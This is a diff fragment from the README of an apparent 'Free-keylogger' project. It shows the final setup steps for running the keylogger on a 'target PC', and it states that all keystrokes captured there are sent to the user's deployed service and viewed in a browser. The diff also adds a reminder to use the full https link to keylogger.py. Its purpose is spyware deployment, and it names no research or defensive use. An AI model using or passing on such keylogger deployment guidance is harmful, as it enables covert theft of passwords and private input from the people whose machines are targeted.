parikshitjangid/Free-keylogger/README.md

 ### Step 10: Start Capturing Keystrokes

 - Once executed, all keystrokes from the target PC will be sent to your deployed service and can be viewed in your browser.
+### Note

-**Note:** Ensure that Python is pre-installed on the target PC before executing the script.
+Ensure that Python is pre-installed on the target PC before executing the script.
+Ensure that when copying the link to the **keylogger.py** file, it includes the full URL, including **"https://"**.